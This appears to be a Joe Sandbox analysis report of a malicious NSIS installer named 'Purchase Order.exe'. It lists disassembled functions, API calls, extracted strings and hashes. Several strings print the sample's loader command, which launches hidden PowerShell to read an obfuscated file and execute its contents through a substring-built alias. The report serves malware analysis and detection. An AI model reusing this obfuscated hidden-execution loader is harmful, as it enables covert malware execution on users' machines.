268->269 270 403ddf-403df3 DestroyWindow 268->270 269->201 271 403dce-403dd4 269->271 270->205 272 403df9-403e26 CreateDialogParamA 270->272 271->196 273 403dda 271->273 272->205 274 403e2c-403e83 call 403f14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 272->274 273->201 274->201 279 403e85-403e98 ShowWindow call 403f60 274->279 281 403e9d 279->281 281->205
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                          • ShowWindow.USER32(?), ref: 00403A9A
                                                          • DestroyWindow.USER32 ref: 00403AAE
                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                          • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403BB4
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                          • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                          • EnableWindow.USER32(?,?), ref: 00403D1D
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                          • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                          • lstrlenA.KERNEL32(Misguidingly Setup: Installing,?,Misguidingly Setup: Installing,Misguidingly Setup), ref: 00403D8E
                                                          • SetWindowTextA.USER32(?,Misguidingly Setup: Installing), ref: 00403D9D
                                                          • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: Misguidingly Setup$Misguidingly Setup: Installing
                                                          • API String ID: 3282139019-3485224092
                                                          • Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                          • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                          • Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                          • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E
                                                          Function 004036AF Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 282 4036af-4036c7 call 4060c8 285 4036c9-4036d9 call 405c8d 282->285 286 4036db-40370c call 405c16 282->286 294 40372f-403758 call 403974 call 40588f 285->294 290 403724-40372a lstrcatA 286->290 291 40370e-40371f call 405c16 286->291 290->294 291->290 300 40375e-403763 294->300 301 4037df-4037e7 call 40588f 294->301 300->301 302 403765-403789 call 405c16 300->302 307 4037f5-40381a LoadImageA 301->307 308 4037e9-4037f0 call 405d51 301->308 302->301 312 40378b-40378d 302->312 310 40389b-4038a3 call 40140b 307->310 311 40381c-40384c RegisterClassA 307->311 308->307 325 4038a5-4038a8 310->325 326 4038ad-4038b8 call 403974 310->326 313 403852-403896 SystemParametersInfoA CreateWindowExA 311->313 314 40396a 311->314 316 40379e-4037aa lstrlenA 312->316 317 40378f-40379c call 4057cc 312->317 313->310 319 40396c-403973 314->319 320 4037d2-4037da call 4057a1 call 405d2f 316->320 321 4037ac-4037ba lstrcmpiA 316->321 317->316 320->301 321->320 324 4037bc-4037c6 GetFileAttributesA 321->324 328 4037c8-4037ca 324->328 329 4037cc-4037cd call 4057e8 324->329 325->319 335 403941-403942 call 40501a 326->335 336 4038be-4038d8 ShowWindow call 40605a 326->336 328->320 328->329 329->320 339 403947-403949 335->339 343 4038e4-4038f6 GetClassInfoA 336->343 344 4038da-4038df call 40605a 336->344 341 403963-403965 call 40140b 339->341 342 40394b-403951 339->342 341->314 342->325 347 403957-40395e call 40140b 342->347 345 4038f8-403908 GetClassInfoA RegisterClassA 343->345 346 40390e-403931 DialogBoxParamA call 40140b 343->346 344->343 345->346 352 403936-40393f call 4035ff 346->352 347->325 352->319
                                                          APIs
                                                            • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                            • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                          • lstrcatA.KERNEL32(1033,Misguidingly Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Misguidingly Setup: Installing,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order.exe",00000000), ref: 0040372A
                                                          • lstrlenA.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\potentially,1033,Misguidingly Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Misguidingly Setup: Installing,00000000,00000002,75923410), ref: 0040379F
                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                          • GetFileAttributesA.KERNEL32(Execute: ), ref: 004037BD
                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\potentially), ref: 00403806
                                                            • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                          • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                          • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                          • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                          • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\potentially$Control Panel\Desktop\ResourceLocale$Execute: $Misguidingly Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 1975747703-20137999
                                                          • Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                          • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                          • Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                          • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D
                                                          Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 356 402c66-402cb4 GetTickCount GetModuleFileNameA call 4059a2 359 402cc0-402cee call 405d2f call 4057e8 call 405d2f GetFileSize 356->359 360 402cb6-402cbb 356->360 368 402cf4 359->368 369 402ddb-402de9 call 402c02 359->369 361 402e98-402e9c 360->361 370 402cf9-402d10 368->370 375 402deb-402dee 369->375 376 402e3e-402e43 369->376 373 402d12 370->373 374 402d14-402d1d call 4030b1 370->374 373->374 382 402d23-402d2a 374->382 383 402e45-402e4d call 402c02 374->383 378 402df0-402e08 call 4030c7 call 4030b1 375->378 379 402e12-402e3c GlobalAlloc call 4030c7 call 402e9f 375->379 376->361 378->376 402 402e0a-402e10 378->402 379->376 407 402e4f-402e60 379->407 386 402da6-402daa 382->386 387 402d2c-402d40 call 40595d 382->387 383->376 392 402db4-402dba 386->392 393 402dac-402db3 call 402c02 386->393 387->392 405 402d42-402d49 387->405 398 402dc9-402dd3 392->398 399 402dbc-402dc6 call 40613d 392->399 393->392 398->370 406 402dd9 398->406 399->398 402->376 402->379 405->392 411 402d4b-402d52 405->411 406->369 408 402e62 407->408 409 402e68-402e6d 407->409 408->409 412 402e6e-402e74 409->412 411->392 413 402d54-402d5b 411->413 412->412 414 402e76-402e91 SetFilePointer call 40595d 412->414 413->392 415 402d5d-402d64 413->415 419 402e96 414->419 415->392 417 402d66-402d86 415->417 417->376 418 402d8c-402d90 417->418 420 402d92-402d96 418->420 421 402d98-402da0 418->421 419->361 420->406 420->421 421->392 422 402da2-402da4 421->422 422->392
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402C77
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order.exe,00000400), ref: 00402C93
                                                            • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004059A6
                                                            • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                          • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 00402CDF
                                                          Strings
                                                          • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                          • "C:\Users\user\Desktop\Purchase Order.exe", xrefs: 00402C66
                                                          • C:\Users\user\Desktop\Purchase Order.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                          • Error launching installer, xrefs: 00402CB6
                                                          • soft, xrefs: 00402D54
                                                          • Inst, xrefs: 00402D4B
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                          • Null, xrefs: 00402D5D
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 4283519449-2237096297
                                                          • Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                          • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                          • Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                          • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD
                                                          Function 00401751 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 554 401751-401774 call 402a3a call 40580e 559 401776-40177c call 405d2f 554->559 560 40177e-401790 call 405d2f call 4057a1 lstrcatA 554->560 566 401795-40179b call 405f9a 559->566 560->566 570 4017a0-4017a4 566->570 571 4017a6-4017b0 call 406033 570->571 572 4017d7-4017da 570->572 580 4017c2-4017d4 571->580 581 4017b2-4017c0 CompareFileTime 571->581 574 4017e2-4017fe call 4059a2 572->574 575 4017dc-4017dd call 40597d 572->575 582 401800-401803 574->582 583 401876-40189f call 404f48 call 402e9f 574->583 575->574 580->572 581->580 584 401805-401847 call 405d2f * 2 call 405d51 call 405d2f call 405525 582->584 585 401858-401862 call 404f48 582->585 597 4018a1-4018a5 583->597 598 4018a7-4018b3 SetFileTime 583->598 584->570 618 40184d-40184e 584->618 595 40186b-401871 585->595 599 4028d8 595->599 597->598 601 4018b9-4018c4 FindCloseChangeNotification 597->601 598->601 603 4028da-4028de 599->603 604 4018ca-4018cd 601->604 605 4028cf-4028d2 601->605 607 4018e2-4018e5 call 405d51 604->607 608 4018cf-4018e0 call 405d51 lstrcatA 604->608 605->599 613 4018ea-402273 call 405525 607->613 608->613 613->603 613->605 618->595 620 401850-401851 618->620 620->585
                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",C:\Users\user\AppData\Local\potentially\Avantgarders,00000000,00000000,00000031), ref: 00401790
                                                          • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)","powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,00000000,"powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",C:\Users\user\AppData\Local\potentially\Avantgarders,00000000,00000000,00000031), ref: 004017BA
                                                            • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Misguidingly Setup,NSIS Error), ref: 00405D3C
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00402FFA,00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0), ref: 00404FA4
                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"), ref: 00404FB6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$"powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$C:\Users\user\AppData\Local\potentially\Avantgarders$C:\Users\user\Documents\bevisliggrelser.hen$C:\Users\user\depecher.fum->C:\Users\user\Documents\bevisliggrelser.hen
                                                          • API String ID: 1941528284-1279281401
                                                          • Opcode ID: 07cf415a6a98710ef5701abfd9ff3185977c001fd6a6371361f328a65f50246f
                                                          • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                          • Opcode Fuzzy Hash: 07cf415a6a98710ef5701abfd9ff3185977c001fd6a6371361f328a65f50246f
                                                          • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D
                                                          Function 00402E9F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 621 402e9f-402eb3 622 402eb5 621->622 623 402ebc-402ec5 621->623 622->623 624 402ec7 623->624 625 402ece-402ed3 623->625 624->625 626 402ee3-402ef0 call 4030b1 625->626 627 402ed5-402ede call 4030c7 625->627 631 402ef6-402efa 626->631 632 40309f 626->632 627->626 633 402f00-402f49 GetTickCount 631->633 634 40304a-40304c 631->634 635 4030a1-4030a2 632->635 638 4030a7 633->638 639 402f4f-402f57 633->639 636 40308c-40308f 634->636 637 40304e-403051 634->637 640 4030aa-4030ae 635->640 641 403091 636->641 642 403094-40309d call 4030b1 636->642 637->638 643 403053 637->643 638->640 644 402f59 639->644 645 402f5c-402f6a call 4030b1 639->645 641->642 642->632 654 4030a4 642->654 648 403056-40305c 643->648 644->645 645->632 653 402f70-402f79 645->653 651 403060-40306e call 4030b1 648->651 652 40305e 648->652 651->632 658 403070-40307c call 405a49 651->658 652->651 657 402f7f-402f9f call 4061ab 653->657 654->638 663 403042-403044 657->663 664 402fa5-402fb8 GetTickCount 657->664 665 403046-403048 658->665 666 40307e-403088 658->666 663->635 667 402fba-402fc2 664->667 668 402ffd-402fff 664->668 665->635 666->648 669 40308a 666->669 670 402fc4-402fc8 667->670 671 402fca-402ff5 MulDiv wsprintfA call 404f48 667->671 672 403001-403005 668->672 673 403036-40303a 668->673 669->638 670->668 670->671 679 402ffa 671->679 676 403007-40300e call 405a49 672->676 677 40301c-403027 672->677 673->639 674 403040 673->674 674->638 681 403013-403015 676->681 678 40302a-40302e 677->678 678->657 682 403034 678->682 679->668 681->665 683 403017-40301a 681->683 682->638 683->678
                                                          APIs
                                                          Strings
                                                          • EA, xrefs: 00402F73, 00402F85
                                                          • probere sydover cannabisens humpendes tupanship utriculariaceaenatbordsskuffers amortization clasped nonruinously rusgift sulphazotize ruinatiousndsignaler unbeloved gruedes nonliteracy modefolkenessstjernerne runden scribbling frdselslreres pulverisers , xrefs: 00402F20
                                                          • DA, xrefs: 00403060
                                                          • DA, xrefs: 00402F5C
                                                          • ... %d%%, xrefs: 00402FE0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: EA$ DA$ DA$... %d%%$probere sydover cannabisens humpendes tupanship utriculariaceaenatbordsskuffers amortization clasped nonruinously rusgift sulphazotize ruinatiousndsignaler unbeloved gruedes nonliteracy modefolkenessstjernerne runden scribbling frdselslreres pulverisers
                                                          • API String ID: 551687249-3082942608
                                                          • Opcode ID: 2b72737498d8f4829c31d655f0fb16f39a0d94af35b4a6af303c262a191fd477
                                                          • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                          • Opcode Fuzzy Hash: 2b72737498d8f4829c31d655f0fb16f39a0d94af35b4a6af303c262a191fd477
                                                          • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA
                                                          Function 00404F48 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 684 404f48-404f5d 685 405013-405017 684->685 686 404f63-404f75 684->686 687 404f80-404f8c lstrlenA 686->687 688 404f77-404f7b call 405d51 686->688 690 404fa9-404fad 687->690 691 404f8e-404f9e lstrlenA 687->691 688->687 693 404fbc-404fc0 690->693 694 404faf-404fb6 SetWindowTextA 690->694 691->685 692 404fa0-404fa4 lstrcatA 691->692 692->690 695 404fc2-405004 SendMessageA * 3 693->695 696 405006-405008 693->696 694->693 695->696 696->685 697 40500a-40500d 696->697 697->685
                                                          APIs
                                                          • lstrlenA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                          • lstrlenA.KERNEL32(00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
